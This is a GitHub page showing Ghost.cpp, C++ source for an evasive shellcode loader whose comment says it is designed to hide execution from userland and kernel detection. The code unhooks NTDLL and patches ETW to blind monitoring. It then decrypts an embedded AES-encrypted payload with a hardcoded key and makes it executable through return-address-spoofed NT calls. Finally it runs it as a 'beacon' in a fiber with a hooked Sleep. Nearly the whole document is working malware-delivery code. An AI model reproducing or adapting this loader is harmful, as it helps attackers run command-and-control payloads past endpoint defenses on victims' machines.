-
Notifications
You must be signed in to change notification settings - Fork 52
/
Ghost.cpp
148 lines (78 loc) · 2.85 KB
/
Ghost.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
/* Evasive shellcode loader designed to hide its execution from userland/kernel-land detections */
#include <iostream>
#include "allocator.h"
#include "resolvers.h"
#include "unhook.h"
#include "retaddrspoof.h"
#include "defs.h"
#include "etw.h"
#include "AES.h"
#include "hook.h"
#include "rsrc.h"
#include "functions.h"
PVOID Gdgt = FindROPGadget(); // used all across the project for ret address spoofing
LPVOID InitialFiber;
unsigned char* rc4key;
unsigned long rc4keysize;
NTSTATUS status;
SIZE_T lpDataSize;
PLARGE_PAGE_INFORMATION pLPI;
unsigned char AesKey[] = { 0xBD, 0x19, 0x3D, 0x27, 0x69, 0x8C, 0xC6, 0x80, 0x86, 0x53, 0x8F, 0x3A, 0x53, 0x82, 0x16, 0x85, 0x9C, 0x01, 0x7C, 0xF3, 0xF9, 0xCA, 0x39, 0x1C, 0x08, 0x61, 0x6E, 0x05, 0x6F, 0x74, 0x7B, 0x08 };
unsigned char AesIv[] = { 0xAD, 0xC7, 0xC0, 0x5B, 0xA8, 0xAB, 0x80, 0x21, 0x95, 0x8E, 0x46, 0xD6, 0x15, 0x6B, 0x8B, 0xA0 };
/* AES vars */
PBYTE AesCipherText;
BOOL decryption;
PVOID pPlainBuffer = nullptr;
DWORD PlainBufferSize = 0;
PVOID ptr = nullptr;
DWORD ResourceSize;
LPVOID Creation = nullptr;
PVOID lpParameter = nullptr;
int main() {
FlushNTDLL();
PatchETW();
GetFromRc(ResourceSize, ptr);
AesCipherText = (PBYTE)malloc((SIZE_T)ResourceSize);
RetSpoofCall((void*)memcpy, 3, Gdgt, AesCipherText, ptr, (SIZE_T)ResourceSize);
decryption = AESDecrypt(
AesCipherText,
ResourceSize,
AesKey,
AesIv,
&pPlainBuffer,
&PlainBufferSize
);
if (!decryption) {
std::cout << "[+] Decryption UnSuccessful" << std::endl;
return -1;
}
pLPI = allocate_large_page(PlainBufferSize);
place_data_rand(pLPI, (PBYTE)pPlainBuffer, PlainBufferSize);
free(AesCipherText);
delete[] pPlainBuffer;
HookFunction(Sleep, FiberSwitcher);
InitialFiber = (LPVOID)RetSpoofCall((void*)e_ConvertThreadToFiber, 1, Gdgt, lpParameter); // converted the current thread to fiber (InitialFiber)
#ifdef _DEBUG_PRINT
std::cout << "[DEBUG] Converted current thread to fiber\n";
#endif
ULONG OldAccessProtection = 0;
status = reinterpret_cast<NTSTATUS>(RetSpoofCall((void*)NtProtectVirtualMemory, 5, Gdgt, SELF_HANDLE, &pLPI->lpPage, &pLPI->uSize, PAGE_EXECUTE_READ, &OldAccessProtection));
NTAPI_VALIDATE_RETURN2NULL(NtProtect_MAIN, status);
Creation = RetSpoofCall((void*)e_CreateFiber, 3, Gdgt, NULL, (LPFIBER_START_ROUTINE)pLPI->lpData, NULL); // Created a New fiber on the EntryPoint (PayloadFiber)
#ifdef _DEBUG_PRINT
std::cout << "[DEBUG] Created the payload fiber\n";
#endif
while (true) { // main infinite loop
#ifdef _DEBUG_PRINT
std::cout << "[DEBUG] Switching to payload fiber\n";
#endif
RetSpoofCall((void*)e_SwitchToFiber, 1, Gdgt, Creation);
// THIS PART IS EXECUTED AFTER THE BEACON CALLS SLEEP (FiberSwitcher)
#ifdef _DEBUG_PRINT
std::cout << "[DEBUG] Sleeping...\n";
#endif
DelayExecution(dwSleepTime);
// and then back to loop start
}
return 0;
}